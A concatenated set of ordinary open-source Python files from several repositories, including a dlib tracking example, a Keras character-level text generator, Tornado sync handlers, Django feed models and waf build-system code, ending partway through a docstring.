ex = cm.exception
assert_regexp_matches(ex.msg, "No shared memory exists with the specified name")
def test_existing_manager_already_exists(self):
# Attempt to create a shared buffer manager that already exists
with assert_raises(SharedBufferManagerException) as cm:
clobbered_shared_buffer = SharedBufferManager(shared_mem_name,
100, 100, True, boost_mmap_mode=boost_mmap_mode)
ex = cm.exception
assert_regexp_matches(ex.msg, "Shared memory with the specified name already exists")
def test_illegal_shared_buffer_index(self):
with assert_raises(SharedBufferManagerException) as cm:
buffer_address = self.shared_buffer_manager.get_buffer_address(-1)
ex = cm.exception
assert_regexp_matches(ex.msg, "Illegal buffer index specified")
with assert_raises(SharedBufferManagerException) as cm:
buffer_address = self.shared_buffer_manager.get_buffer_address(num_buffers)
ex = cm.exception
assert_regexp_matches(ex.msg, "Illegal buffer index specified")
def test_write_and_read_from_buffer(self):
data_block = Struct('QQQ')
values = (0xdeadbeef, 0x12345678, 0xaaaa5555aaaa5555)
raw_data = data_block.pack(*values)
self.shared_buffer_manager.write_buffer(0, raw_data)
read_raw = self.shared_buffer_manager.read_buffer(0, data_block.size)
read_values = data_block.unpack(read_raw)
assert_equal(values, read_values)
|
weinitom/robot
|
refs/heads/master
|
attention_tracker/dlib-18.16/python_examples/correlation_tracker.py
|
1
|
#!/usr/bin/python
# The contents of this file are in the public domain. See LICENSE_FOR_EXAMPLE_PROGRAMS.txt
#
# This example shows how to use the correlation_tracker from the dlib Python
# library. This object lets you track the position of an object as it moves
# from frame to frame in a video sequence. To use it, you give the
# correlation_tracker the bounding box of the object you want to track in the
# current video frame. Then it will identify the location of the object in
# subsequent frames.
#
# In this particular example, we are going to run on the
# video sequence that comes with dlib, which can be found in the
# examples/video_frames folder. This video shows a juice box sitting on a table
# and someone is waving the camera around. The task is to track the position of
# the juice box as the camera moves around.
#
# COMPILING THE DLIB PYTHON INTERFACE
# Dlib comes with a compiled python interface for python 2.7 on MS Windows. If
# you are using another python version or operating system then you need to
# compile the dlib python interface before you can use this file. To do this,
# run compile_dlib_python_module.bat. This should work on any operating
# system so long as you have CMake and boost-python installed.
# On Ubuntu, this can be done easily by running the command:
# sudo apt-get install libboost-python-dev cmake
#
# Also note that this example requires scikit-image which can be installed
# via the command:
# pip install -U scikit-image
# Or downloaded from http://scikit-image.org/download.html.
import os
import glob
import dlib
from skimage import io
# Path to the video frames
video_folder = os.path.join("..", "examples", "video_frames")
# Create the correlation tracker - the object needs to be initialized
# before it can be used
tracker = dlib.correlation_tracker()
win = dlib.image_window()
# We will track the frames as we load them off of disk
for k, f in enumerate(sorted(glob.glob(os.path.join(video_folder, "*.jpg")))):
print("Processing Frame {}".format(k))
img = io.imread(f)
# We need to initialize the tracker on the first frame
if k == 0:
# Start a track on the juice box. If you look at the first frame you
# will see that the juice box is contained within the bounding
# box (74, 67, 112, 153).
tracker.start_track(img, dlib.rectangle(74, 67, 112, 153))
else:
# Else we just attempt to track from the previous frame
tracker.update(img)
win.clear_overlay()
win.set_image(img)
win.add_overlay(tracker.get_position())
dlib.hit_enter_to_continue()
|
excelsimon/AI
|
refs/heads/master
|
NLP/5-DL-NLP/Char_RNN.py
|
1
|
# coding: utf-8
# # LSTM text generation at the character level
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
import codecs
raw_text = codecs.open('Winston_Churchil.txt','r',encoding='utf-8').read()
raw_text = raw_text.lower()
chars = sorted(list(set(raw_text)))
char_to_int = dict((c, i) for i, c in enumerate(chars))
int_to_char = dict((i, c) for i, c in enumerate(chars))
for item in ((c, i) for i, c in enumerate(chars)):
print(item)
# Training set: input the previous 100 characters, predict the next one
seq_length = 100
x = []
y = []
for i in range(0, len(raw_text) - seq_length):
given = raw_text[i:i + seq_length]
predict = raw_text[i + seq_length]
x.append([char_to_int[char] for char in given])
y.append(char_to_int[predict])
# At this point the representations above are essentially a bag of words,
# or in other words an index.
#
# Two things remain:
# - We already have a numeric (index) representation of the input; it has to
#   be reshaped into the array format the LSTM expects: [samples, time steps,
#   feature dimensions].
# - For the output, predicting a one-hot vector gives better results than
#   predicting an exact numeric y value directly.
n_patterns = len(x)
n_vocab = len(chars)
# Reshape x into the form the LSTM needs
x = numpy.reshape(x, (n_patterns, seq_length, 1))
# Simple normalization to the 0-1 range
x = x / float(n_vocab)
# Convert the output to one-hot
y = np_utils.to_categorical(y)
# # Build the LSTM model
model = Sequential()
model.add(LSTM(256,input_shape=(x.shape[1],x.shape[2]))) # the sample count is not part of input_shape
model.add(Dropout(0.2))
model.add(Dense(y.shape[1],activation="softmax"))
model.compile(loss="categorical_crossentropy",optimizer="adam")
model.fit(x,y,nb_epoch=50,batch_size=4096)
def predict_next(input_array):
x = numpy.reshape(input_array, (1, seq_length, 1))
x = x / float(n_vocab)
y = model.predict(x)
return y
def string_to_index(raw_input):
res = []
for c in raw_input[(len(raw_input)-seq_length):]:
res.append(char_to_int[c])
return res
def y_to_char(y):
largest_index = y.argmax()
c = int_to_char[largest_index]
return c
def generate_article(init, rounds=200):
in_string = init.lower()
for i in range(rounds):
n = y_to_char(predict_next(string_to_index(in_string)))
in_string += n
return in_string
init = 'His object in coming to New York was to engage officers for that service. He came at an opportune moment'
article = generate_article(init)
print(article)
|
aclindsa/asink-python
|
refs/heads/master
|
src/server/handlers.py
|
1
|
# Copyright (C) 2011 Aaron Lindsay <aaron@aclindsay.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import tornado.web
import threading
import logging
from shared import events
from database import Database
from time import time
local = threading.local()
local.database = Database()
class WebHandler(tornado.web.RequestHandler):
def get(self):
self.write("Web interface not yet implemented, sorry\n")
class TimeSyncHandler(tornado.web.RequestHandler):
def get(self):
self.write(str(time()))
class UpdatesMixin(object):
waiters = {}
waiters_lock = threading.Lock() #TODO make locking per-userid
def wait_for_updates(self, userid, callback):
cls = UpdatesMixin
cls.waiters_lock.acquire()
if userid in cls.waiters:
cls.waiters[userid].append(callback)
else:
cls.waiters[userid] = [callback]
cls.waiters_lock.release()
def updates_ready(self, userid, events):
cls = UpdatesMixin
cls.waiters_lock.acquire()
if userid in cls.waiters:
for callback in cls.waiters[userid]:
callback(events)
cls.waiters[userid] = []
cls.waiters_lock.release()
class EventsHandler(tornado.web.RequestHandler, UpdatesMixin):
"""Handle HTTP requests sent to <hostname:port>/api endpoint -
namely update and delete events for files."""
def post(self):
#TODO - actually get their userid here
userid = 0
try:
j = self.get_argument("data")
data = json.loads(j)
query = "INSERT INTO events VALUES (NULL,?,?,?,?,?,?,?)"
event = events.Event(0)
for e in data:
event.fromseq(e)
local.database.execute(query, event.totuple()[1:])
e[0] = local.database.lastrowid()
self.updates_ready(userid, data) #send updates to any waiting
#long-polling connections
except:
raise tornado.web.HTTPError(400)
class PollingHandler(tornado.web.RequestHandler, UpdatesMixin):
"""Handle long-polling HTTP requests sent to
<hostname:port>/api/updates/<lastrev> endpoint"""
@tornado.web.asynchronous
def get(self, lastrev):
#TODO - actually get their userid here
userid = 0
#check and see if there are already updates waiting on this user. If
#there are, return them and don't mess with keeping this connection
#around.
logging.info("Update request w/ ip=%s, userid=%s, lastrev=%s" %
(self.request.remote_ip, userid, lastrev))
res = local.database.execute("""SELECT * FROM events WHERE user=? AND
rev > ? ORDER BY rev ASC""", (userid, lastrev))
events = []
for e in res:
events.append(e)
if len(events) > 0:
logging.debug("%s events already available, returning those" %
len(events))
self.on_new_events(events)
else:
logging.debug("No events available, blocking")
self.wait_for_updates(userid, self.async_callback(self.on_new_events))
def on_new_events(self, events):
if self.request.connection.stream.closed():
return
self.write(json.dumps(events))
self.finish()
|
leoliujie/odoo
|
refs/heads/8.0
|
addons/website_crm/__openerp__.py
|
321
|
{
'name': 'Contact Form',
'category': 'Website',
'website': 'https://www.odoo.com/page/website-builder',
'summary': 'Create Leads From Contact Form',
'version': '1.0',
'description': """
OpenERP Contact Form
====================
""",
'author': 'OpenERP SA',
'depends': ['website_partner', 'crm'],
'data': [
'data/website_crm_data.xml',
'views/website_crm.xml',
],
'installable': True,
'auto_install': False,
}
|
nthien/docker-registry
|
refs/heads/master
|
tests/lib/index/test_db.py
|
35
|
import unittest
import mock
from docker_registry.lib.index import db
class TestVersion(unittest.TestCase):
def setUp(self):
self.version = db.Version()
def test_repr(self):
self.assertEqual(type(repr(self.version)), str)
class TestRepository(unittest.TestCase):
def setUp(self):
self.repository = db.Repository()
def test_repr(self):
self.assertEqual(type(repr(self.repository)), str)
class TestSQLAlchemyIndex(unittest.TestCase):
def setUp(self):
self.index = db.SQLAlchemyIndex(database="sqlite://")
@mock.patch('sqlalchemy.engine.Engine.has_table', return_value=True)
@mock.patch('sqlalchemy.orm.query.Query.first')
def test_setup_database(self, first, has_table):
first = mock.Mock( # noqa
side_effect=db.sqlalchemy.exc.OperationalError)
self.assertRaises(
NotImplementedError, db.SQLAlchemyIndex, database="sqlite://")
|
bstell/TachyFont
|
refs/heads/master
|
run_time/src/gae_server/third_party/fonttools/Lib/fontTools/pens/cocoaPen.py
|
14
|
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.pens.basePen import BasePen
__all__ = ["CocoaPen"]
class CocoaPen(BasePen):
def __init__(self, glyphSet, path=None):
BasePen.__init__(self, glyphSet)
if path is None:
from AppKit import NSBezierPath
path = NSBezierPath.bezierPath()
self.path = path
def _moveTo(self, p):
self.path.moveToPoint_(p)
def _lineTo(self, p):
self.path.lineToPoint_(p)
def _curveToOne(self, p1, p2, p3):
self.path.curveToPoint_controlPoint1_controlPoint2_(p3, p1, p2)
def _closePath(self):
self.path.closePath()
|
mudithkr/zamboni
|
refs/heads/master
|
mkt/feed/models.py
|
7
|
"""
The feed is an assembly of items of different content types.
For ease of querying, each different content type is housed in the FeedItem
model, which also houses metadata indicating the conditions under which it
should be included. So a feed is actually just a listing of FeedItem instances
that match the user's region and carrier.
Current content types able to be attached to FeedItem:
- `FeedApp` (via the `app` field)
- `FeedBrand` (via the `brand` field)
- `FeedCollection` (via the `collection` field)
"""
import os
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_delete
from django.dispatch import receiver
import mkt
import mkt.carriers
import mkt.regions
from mkt.constants.categories import CATEGORY_CHOICES
from mkt.feed import indexers
from mkt.ratings.validators import validate_rating
from mkt.site.decorators import use_master
from mkt.site.fields import ColorField
from mkt.site.models import ManagerBase, ModelBase
from mkt.translations.fields import PurifiedField, TranslatedField, save_signal
from mkt.webapps.models import clean_slug, Preview, Webapp
from mkt.webapps.tasks import index_webapps
from .constants import (BRAND_LAYOUT_CHOICES, BRAND_TYPE_CHOICES,
COLLECTION_TYPE_CHOICES,
FEEDAPP_TYPE_CHOICES)
class BaseFeedCollection(ModelBase):
"""
On the feed, there are a number of types of feed items that share a similar
structure: a slug, one or more member apps with a maintained sort order,
and a number of methods and common views for operating on those apps. This
is a base class for those feed items, including:
- Editorial Brands: `FeedBrand`
- Collections: `FeedCollection`
- Operator Shelves: `FeedShelf`
A series of base classes wraps the common code for these:
- BaseFeedCollection
- BaseFeedCollectionMembership
- BaseFeedCollectionSerializer
- BaseFeedCollectionViewSet
Subclasses of BaseFeedCollection must do a few things:
- Define an M2M field named `_apps` with a custom through model that
inherits from `BaseFeedCollectionMembership`.
- Set the `membership_class` class property to the custom through model
used by `_apps`.
- Set the `membership_relation` class property to the name of the relation
on the model.
"""
_apps = None
slug = models.CharField(blank=True, max_length=30, unique=True,
help_text='Used in collection URLs.')
membership_class = None
membership_relation = None
objects = ManagerBase()
class Meta:
abstract = True
ordering = ('-id',)
def save(self, **kw):
self.clean_slug()
return super(BaseFeedCollection, self).save(**kw)
@use_master
def clean_slug(self):
clean_slug(self, 'slug')
def apps(self):
"""
Public apps on the collection, ordered by their position in the
CollectionMembership model.
        Use this method every time you want to display apps for a collection
        to a user.
"""
filters = {
'disabled_by_user': False,
'status': mkt.STATUS_PUBLIC
}
return self._apps.order_by(self.membership_relation).filter(**filters)
def add_app(self, app, order=None):
"""
Add an app to this collection. If specified, the app will be created
with the specified `order`. If not, it will be added to the end of the
collection.
"""
qs = self.membership_class.objects.filter(obj=self)
if order is None:
aggregate = qs.aggregate(models.Max('order'))['order__max']
order = aggregate + 1 if aggregate is not None else 0
rval = self.membership_class.objects.create(obj=self, app=app,
order=order)
index_webapps.delay([app.pk])
return rval
def remove_app(self, app):
"""
Remove the passed app from this collection, returning a boolean
indicating whether a successful deletion took place.
"""
try:
membership = self.membership_class.objects.get(obj=self, app=app)
except self.membership_class.DoesNotExist:
return False
else:
membership.delete()
index_webapps.delay([app.pk])
return True
def remove_apps(self):
"""Remove all apps from collection."""
self.membership_class.objects.filter(obj=self).delete()
def set_apps(self, new_apps):
"""
Passed a list of app IDs, will remove all existing members on the
collection and create new ones for each of the passed apps, in order.
"""
self.remove_apps()
for app_id in new_apps:
self.add_app(Webapp.objects.get(pk=app_id))
index_webapps.delay(new_apps)
class BaseFeedImage(models.Model):
image_hash = models.CharField(default=None, max_length=8, null=True,
blank=True)
class Meta:
abstract = True
class GroupedAppsMixin(object):
"""
An app's membership to a `FeedShelf` class, used as the through model for
`FeedShelf._apps`.
"""
def add_app_grouped(self, app, group, order=None):
"""
Add an app to this collection, as a member of the passed `group`.
If specified, the app will be created with the specified `order`. If
not, it will be added to the end of the collection.
"""
qs = self.membership_class.objects.filter(obj=self)
if order is None:
aggregate = qs.aggregate(models.Max('order'))['order__max']
order = aggregate + 1 if aggregate is not None else 0
rval = self.membership_class.objects.create(obj_id=self.id, app_id=app,
group=group, order=order)
index_webapps.delay([app])
return rval
def set_apps_grouped(self, new_apps):
self.remove_apps()
for group in new_apps:
for app in group['apps']:
self.add_app_grouped(app, group['name'])
class BaseFeedCollectionMembership(ModelBase):
"""
A custom `through` model is required for the M2M field `_apps` on
subclasses of `BaseFeedCollection`. This model houses an `order` field that
maintains the order of apps in the collection. This model serves as an
abstract base class for the custom `through` models.
Subclasses must:
- Define a `ForeignKey` named `obj` that relates the app to the instance
being put on the feed.
"""
app = models.ForeignKey(Webapp)
order = models.SmallIntegerField(null=True)
obj = None
class Meta:
abstract = True
ordering = ('order',)
unique_together = ('obj', 'app',)
class FeedBrandMembership(BaseFeedCollectionMembership):
"""
An app's membership to a `FeedBrand` class, used as the through model for
`FeedBrand._apps`.
"""
obj = models.ForeignKey('FeedBrand')
class Meta(BaseFeedCollectionMembership.Meta):
abstract = False
db_table = 'mkt_feed_brand_membership'
class FeedBrand(BaseFeedCollection):
"""
Model for "Editorial Brands", a special type of collection that allows
editors to quickly create content without involving localizers by choosing
from one of a number of predefined, prelocalized titles.
"""
_apps = models.ManyToManyField(Webapp, through=FeedBrandMembership,
related_name='app_feed_brands')
layout = models.CharField(choices=BRAND_LAYOUT_CHOICES, max_length=30)
type = models.CharField(choices=BRAND_TYPE_CHOICES, max_length=30)
membership_class = FeedBrandMembership
membership_relation = 'feedbrandmembership'
class Meta(BaseFeedCollection.Meta):
abstract = False
db_table = 'mkt_feed_brand'
@classmethod
def get_indexer(self):
return indexers.FeedBrandIndexer
class FeedCollectionMembership(BaseFeedCollectionMembership):
"""
An app's membership to a `FeedCollection` class, used as the through model
    for `FeedCollection._apps`.
"""
obj = models.ForeignKey('FeedCollection')
group = PurifiedField(blank=True, null=True)
class Meta(BaseFeedCollectionMembership.Meta):
abstract = False
db_table = 'mkt_feed_collection_membership'
class FeedCollection(GroupedAppsMixin, BaseFeedCollection,
BaseFeedImage):
"""
Model for "Collections", a type of curated collection that allows more
complex grouping of apps than an Editorial Brand.
"""
_apps = models.ManyToManyField(Webapp, through=FeedCollectionMembership,
related_name='app_feed_collections')
color = models.CharField(max_length=20, null=True, blank=True)
name = TranslatedField()
description = PurifiedField(blank=True, null=True)
type = models.CharField(choices=COLLECTION_TYPE_CHOICES, max_length=30,
null=True)
# Deprecated.
background_color = models.CharField(max_length=7, null=True, blank=True)
membership_class = FeedCollectionMembership
membership_relation = 'feedcollectionmembership'
class Meta(BaseFeedCollection.Meta):
abstract = False
db_table = 'mkt_feed_collection'
    @classmethod
    def get_indexer(cls):
        return indexers.FeedCollectionIndexer
def image_path(self, suffix=''):
return os.path.join(settings.FEED_COLLECTION_BG_PATH,
str(self.pk / 1000),
'feed_collection{suffix}_{pk}.png'.format(
suffix=suffix, pk=self.pk))
class FeedShelfMembership(BaseFeedCollectionMembership):
"""
An app's membership to a `FeedShelf` class, used as the through model for
`FeedShelf._apps`.
"""
group = PurifiedField(blank=True, null=True)
obj = models.ForeignKey('FeedShelf')
class Meta(BaseFeedCollectionMembership.Meta):
abstract = False
db_table = 'mkt_feed_shelf_membership'
class FeedShelf(GroupedAppsMixin, BaseFeedCollection, BaseFeedImage):
"""
Model for "Operator Shelves", a special type of collection that gives
operators a place to centralize content they wish to feature.
"""
_apps = models.ManyToManyField(Webapp, through=FeedShelfMembership,
related_name='app_shelves')
carrier = models.IntegerField(choices=mkt.carriers.CARRIER_CHOICES)
description = PurifiedField(null=True)
name = TranslatedField()
region = models.PositiveIntegerField(
choices=mkt.regions.REGIONS_CHOICES_ID)
# Shelf landing image.
image_landing_hash = models.CharField(default=None, max_length=8,
null=True, blank=True)
membership_class = FeedShelfMembership
membership_relation = 'feedshelfmembership'
class Meta(BaseFeedCollection.Meta):
abstract = False
db_table = 'mkt_feed_shelf'
    @classmethod
    def get_indexer(cls):
        return indexers.FeedShelfIndexer
def image_path(self, suffix=''):
return os.path.join(settings.FEED_SHELF_BG_PATH,
str(self.pk / 1000),
'feed_shelf{suffix}_{pk}.png'.format(
suffix=suffix, pk=self.pk))
@property
def is_published(self):
return self.feeditem_set.exists()
class FeedApp(BaseFeedImage, ModelBase):
"""
Model for "Custom Featured Apps", a feed item highlighting a single app
and some additional metadata (e.g. a review or a screenshot).
"""
app = models.ForeignKey(Webapp)
description = PurifiedField()
slug = models.CharField(max_length=30, unique=True)
color = models.CharField(max_length=20, null=True, blank=True)
type = models.CharField(choices=FEEDAPP_TYPE_CHOICES, max_length=30)
# Optionally linked to a Preview (screenshot or video).
preview = models.ForeignKey(Preview, null=True, blank=True)
# Optionally linked to a pull quote.
pullquote_attribution = models.CharField(max_length=50, null=True,
blank=True)
pullquote_rating = models.PositiveSmallIntegerField(
null=True, blank=True, validators=[validate_rating])
pullquote_text = PurifiedField(null=True)
# Deprecated.
background_color = ColorField(null=True)
class Meta:
db_table = 'mkt_feed_app'
    @classmethod
    def get_indexer(cls):
        return indexers.FeedAppIndexer
def clean(self):
"""
Require `pullquote_text` if `pullquote_rating` or
`pullquote_attribution` are set.
"""
if not self.pullquote_text and (self.pullquote_rating or
self.pullquote_attribution):
raise ValidationError('Pullquote text required if rating or '
'attribution is defined.')
super(FeedApp, self).clean()
def image_path(self, suffix=''):
return os.path.join(settings.FEATURED_APP_BG_PATH,
str(self.pk / 1000),
'featured_app{suffix}_{pk}.png'.format(
suffix=suffix, pk=self.pk))
class FeedItem(ModelBase):
"""
    A thin wrapper for all items that live on the feed, including metadata
    describing the conditions under which the feed item should be included
    in a user's feed.
"""
category = models.CharField(null=True, blank=True, max_length=30,
choices=CATEGORY_CHOICES)
region = models.PositiveIntegerField(
default=None, null=True, blank=True, db_index=True,
choices=mkt.regions.REGIONS_CHOICES_ID)
carrier = models.IntegerField(default=None, null=True, blank=True,
choices=mkt.carriers.CARRIER_CHOICES,
db_index=True)
order = models.SmallIntegerField(null=True)
item_type = models.CharField(max_length=30)
# Types of objects that may be contained by a feed item.
app = models.ForeignKey(FeedApp, blank=True, null=True)
brand = models.ForeignKey(FeedBrand, blank=True, null=True)
collection = models.ForeignKey(FeedCollection, blank=True, null=True)
shelf = models.ForeignKey(FeedShelf, blank=True, null=True)
class Meta:
db_table = 'mkt_feed_item'
ordering = ('order',)
index_together = (('region', 'carrier'),
('category', 'region', 'carrier'))
@classmethod
def get_indexer(cls):
return indexers.FeedItemIndexer
# Maintain ElasticSearch index.
@receiver(models.signals.post_save, sender=FeedApp,
dispatch_uid='feedapp.search.index')
@receiver(models.signals.post_save, sender=FeedBrand,
dispatch_uid='feedbrand.search.index')
@receiver(models.signals.post_save, sender=FeedCollection,
dispatch_uid='feedcollection.search.index')
@receiver(models.signals.post_save, sender=FeedShelf,
dispatch_uid='feedshelf.search.index')
@receiver(models.signals.post_save, sender=FeedItem,
dispatch_uid='feeditem.search.index')
def update_search_index(sender, instance, **kw):
instance.get_indexer().index_ids([instance.id])
# Delete ElasticSearch index on delete.
@receiver(models.signals.post_delete, sender=FeedApp,
dispatch_uid='feedapp.search.unindex')
@receiver(models.signals.post_delete, sender=FeedBrand,
dispatch_uid='feedbrand.search.unindex')
@receiver(models.signals.post_delete, sender=FeedCollection,
dispatch_uid='feedcollection.search.unindex')
@receiver(models.signals.post_delete, sender=FeedShelf,
dispatch_uid='feedshelf.search.unindex')
@receiver(models.signals.post_delete, sender=FeedItem,
dispatch_uid='feeditem.search.unindex')
def delete_search_index(sender, instance, **kw):
instance.get_indexer().unindex(instance.id)
# Save translations when saving instance with translated fields.
models.signals.pre_save.connect(
save_signal, sender=FeedApp,
dispatch_uid='feedapp_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedCollection,
dispatch_uid='feedcollection_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedCollectionMembership,
dispatch_uid='feedcollectionmembership_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedShelf,
dispatch_uid='feedshelf_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedShelfMembership,
dispatch_uid='feedshelfmembership_translations')
# Delete membership instances when their apps are deleted.
def remove_memberships(*args, **kwargs):
instance = kwargs.get('instance')
for cls in [FeedBrandMembership, FeedCollectionMembership,
FeedShelfMembership]:
cls.objects.filter(app_id=instance.pk).delete()
post_delete.connect(remove_memberships, sender=Webapp, weak=False,
dispatch_uid='cleanup_feed_membership')
|
Outernet-Project/librarian
|
refs/heads/master
|
librarian/core/contrib/sessions/migrations/sessions/01_01_add_sessions_table.py
|
2
|
SQL = """
create table sessions
(
session_id varchar primary key, -- session id
    data varchar,                   -- arbitrary session data
expires timestamptz not null -- timestamp when session expires
);
"""
def up(db, conf):
db.executescript(SQL)
|
tsteward/the-blue-alliance
|
refs/heads/master
|
database/database_query.py
|
4
|
import datetime
from google.appengine.api import memcache
from google.appengine.ext import ndb
import logging
from models.cached_query_result import CachedQueryResult
import random
import tba_config
MEMCACHE_CLIENT = memcache.Client()
class DatabaseQuery(object):
DATABASE_QUERY_VERSION = 2
DATABASE_HITS_MEMCACHE_KEYS = ['database_query_hits_{}:{}'.format(i, DATABASE_QUERY_VERSION) for i in range(25)]
DATABASE_MISSES_MEMCACHE_KEYS = ['database_query_misses_{}:{}'.format(i, DATABASE_QUERY_VERSION) for i in range(25)]
BASE_CACHE_KEY_FORMAT = "{}:{}:{}" # (partial_cache_key, cache_version, database_query_version)
VALID_DICT_VERSIONS = {3}
DICT_CONVERTER = None
def __init__(self, *args):
self._query_args = args
@property
def cache_key(self):
if not hasattr(self, '_cache_key'):
self._cache_key = self.BASE_CACHE_KEY_FORMAT.format(
self.CACHE_KEY_FORMAT.format(*self._query_args),
self.CACHE_VERSION,
self.DATABASE_QUERY_VERSION)
return self._cache_key
@classmethod
def delete_cache_multi(cls, cache_keys):
all_cache_keys = []
for cache_key in cache_keys:
all_cache_keys.append(cache_key)
if cls.DICT_CONVERTER is not None:
all_cache_keys += [cls._dict_cache_key(cache_key, valid_dict_version) for valid_dict_version in cls.VALID_DICT_VERSIONS]
logging.info("Deleting db query cache keys: {}".format(all_cache_keys))
ndb.delete_multi([ndb.Key(CachedQueryResult, cache_key) for cache_key in all_cache_keys])
@classmethod
def _dict_cache_key(cls, cache_key, dict_version):
return '{}~dictv{}.{}'.format(cache_key, dict_version, cls.DICT_CONVERTER.SUBVERSIONS[dict_version])
def fetch(self, dict_version=None, return_updated=False):
return self.fetch_async(
dict_version=dict_version,
return_updated=return_updated).get_result()
@ndb.tasklet
def fetch_async(self, dict_version=None, return_updated=False):
if dict_version:
if dict_version not in self.VALID_DICT_VERSIONS:
raise Exception("Bad api version for database query: {}".format(dict_version))
cache_key = self._dict_cache_key(self.cache_key, dict_version)
else:
cache_key = self.cache_key
cached_query = yield CachedQueryResult.get_by_id_async(cache_key)
do_stats = random.random() < tba_config.RECORD_FRACTION
rpcs = []
if cached_query is None:
if do_stats:
rpcs.append(MEMCACHE_CLIENT.incr_async(
random.choice(self.DATABASE_MISSES_MEMCACHE_KEYS),
initial_value=0))
query_result = yield self._query_async()
if dict_version:
query_result = self.DICT_CONVERTER.convert(query_result, dict_version)
if tba_config.CONFIG['database_query_cache']:
if dict_version:
rpcs.append(CachedQueryResult(
id=cache_key,
result_dict=query_result,
).put_async())
else:
rpcs.append(CachedQueryResult(
id=cache_key,
result=query_result,
).put_async())
updated = datetime.datetime.now()
else:
if do_stats:
rpcs.append(MEMCACHE_CLIENT.incr_async(
random.choice(self.DATABASE_HITS_MEMCACHE_KEYS),
initial_value=0))
if dict_version:
query_result = cached_query.result_dict
else:
query_result = cached_query.result
updated = cached_query.updated
for rpc in rpcs:
try:
rpc.get_result()
            except Exception, e:
                logging.warning("An RPC in DatabaseQuery.fetch_async() failed: %s", e)
if return_updated:
raise ndb.Return((query_result, updated))
else:
raise ndb.Return(query_result)
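# A minimal subclass sketch (hypothetical names; the real queries live in
# other modules of this repo). Subclasses supply CACHE_KEY_FORMAT,
# CACHE_VERSION and an ndb tasklet _query_async() returning the uncached
# result:
#
# class TeamQuery(DatabaseQuery):
#     CACHE_KEY_FORMAT = 'team_{}'
#     CACHE_VERSION = 1
#
#     @ndb.tasklet
#     def _query_async(self):
#         team_key = self._query_args[0]
#         team = yield ndb.Key('Team', team_key).get_async()
#         raise ndb.Return(team)
#
# team = TeamQuery('frc604').fetch()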
|
engla/kupfer
|
refs/heads/master
|
waflib/Scripting.py
|
5
|
#!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2005-2010 (ita)
"Module called for configuring, compiling and installing targets"
import os, shutil, traceback, errno, sys, stat
from waflib import Utils, Configure, Logs, Options, ConfigSet, Context, Errors, Build, Node
build_dir_override = None
no_climb_commands = ['configure']
default_cmd = "build"
def waf_entry_point(current_directory, version, wafdir):
"""
This is the main entry point, all Waf execution starts here.
:param current_directory: absolute path representing the current directory
:type current_directory: string
:param version: version number
:type version: string
:param wafdir: absolute path representing the directory of the waf library
:type wafdir: string
"""
Logs.init_log()
if Context.WAFVERSION != version:
Logs.error('Waf script %r and library %r do not match (directory %r)' % (version, Context.WAFVERSION, wafdir))
sys.exit(1)
if '--version' in sys.argv:
Context.run_dir = current_directory
ctx = Context.create_context('options')
ctx.curdir = current_directory
ctx.parse_args()
sys.exit(0)
Context.waf_dir = wafdir
Context.launch_dir = current_directory
# if 'configure' is in the commands, do not search any further
no_climb = os.environ.get('NOCLIMB', None)
if not no_climb:
for k in no_climb_commands:
if k in sys.argv:
no_climb = True
break
# try to find a lock file (if the project was configured)
# at the same time, store the first wscript file seen
cur = current_directory
while cur:
lst = os.listdir(cur)
if Options.lockfile in lst:
env = ConfigSet.ConfigSet()
try:
env.load(os.path.join(cur, Options.lockfile))
ino = os.stat(cur)[stat.ST_INO]
except Exception:
pass
else:
# check if the folder was not moved
for x in [env.run_dir, env.top_dir, env.out_dir]:
if Utils.is_win32:
if cur == x:
load = True
break
else:
# if the filesystem features symlinks, compare the inode numbers
try:
ino2 = os.stat(x)[stat.ST_INO]
except:
pass
else:
if ino == ino2:
load = True
break
else:
Logs.warn('invalid lock file in %s' % cur)
load = False
if load:
Context.run_dir = env.run_dir
Context.top_dir = env.top_dir
Context.out_dir = env.out_dir
break
if not Context.run_dir:
if Context.WSCRIPT_FILE in lst:
Context.run_dir = cur
next = os.path.dirname(cur)
if next == cur:
break
cur = next
if no_climb:
break
if not Context.run_dir:
if '-h' in sys.argv or '--help' in sys.argv:
Logs.warn('No wscript file found: the help message may be incomplete')
Context.run_dir = current_directory
ctx = Context.create_context('options')
ctx.curdir = current_directory
ctx.parse_args()
sys.exit(0)
Logs.error('Waf: Run from a directory containing a file named %r' % Context.WSCRIPT_FILE)
sys.exit(1)
try:
os.chdir(Context.run_dir)
except OSError:
Logs.error('Waf: The folder %r is unreadable' % Context.run_dir)
sys.exit(1)
try:
set_main_module(Context.run_dir + os.sep + Context.WSCRIPT_FILE)
except Errors.WafError as e:
Logs.pprint('RED', e.verbose_msg)
Logs.error(str(e))
sys.exit(1)
except Exception as e:
Logs.error('Waf: The wscript in %r is unreadable' % Context.run_dir, e)
traceback.print_exc(file=sys.stdout)
sys.exit(2)
"""
import cProfile, pstats
cProfile.runctx("import Scripting; Scripting.run_commands()", {}, {}, 'profi.txt')
p = pstats.Stats('profi.txt')
p.sort_stats('time').print_stats(25)
"""
try:
run_commands()
except Errors.WafError as e:
if Logs.verbose > 1:
Logs.pprint('RED', e.verbose_msg)
Logs.error(e.msg)
sys.exit(1)
except Exception as e:
traceback.print_exc(file=sys.stdout)
sys.exit(2)
except KeyboardInterrupt:
Logs.pprint('RED', 'Interrupted')
sys.exit(68)
#"""
def set_main_module(file_path):
"""
Read the main wscript file into :py:const:`waflib.Context.Context.g_module` and
bind default functions such as ``init``, ``dist``, ``distclean`` if not defined.
Called by :py:func:`waflib.Scripting.waf_entry_point` during the initialization.
